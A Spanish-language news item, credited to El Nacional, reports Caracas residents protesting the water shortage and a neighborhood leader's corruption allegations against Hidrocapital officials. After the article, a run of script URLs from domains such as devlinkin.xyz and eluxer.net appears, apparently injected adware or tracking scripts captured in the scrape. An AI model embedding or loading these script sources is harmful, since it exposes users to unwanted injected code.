Habitantes de distintos sectores de Caracas acudirán la próxima semana hasta la institución para pedir soluciones ante la crisis de agua que enfrenta el país.

Carlos Julio Rojas, coordinador del Frente en Defensa del Norte de Caracas, informó que un grupo de personas protestaron en la entrada de la Contraloría General de la República para exigir una investigación contra los directivos de Hidrocapital por presuntos hechos de corrupción.

Rojas señaló que Edison Torrealba, presidente de Hidrocapital, y Ramón Velásquez ministro del Ecosocialismo y Aguas recibieron presupuestos millonarios los cuales no fueron destinados a mejorar la distribución de agua en la capital.

“Por ejemplo en 2008 Hugo Chávez aprobó 450 millones de dólares para construir el sistema Tuy 4, hoy este proyecto quedo en el olvido, Maduro incluso en 2018 dijo que se destinaron recursos para solucionar la escasez de agua en Caracas, pero este dinero no se ha visto reflejado en una calidad del servicio”, dijo.

Indicó que la siguiente semana se realizará una marcha hasta la sede de Hidrocapital, donde convertirán la entrada del lugar en “un muro de lamentos y quejas” con respecto a la situación del agua en el país.

“Ya hemos hablado con vecinos de El Paraíso, Chacao y Baruta por solo mencionar algunos para ejecutar esta acción ciudadana protestándole en la cara a Evelyn Vázquez y Yolanda Pérez para que deje de sentir miedo del pueblo caraqueño”, señaló.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=36https://devlinkin.xyz/addons/lnkr5.min.jshttps://devlinkin.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51824_6748_

Loading...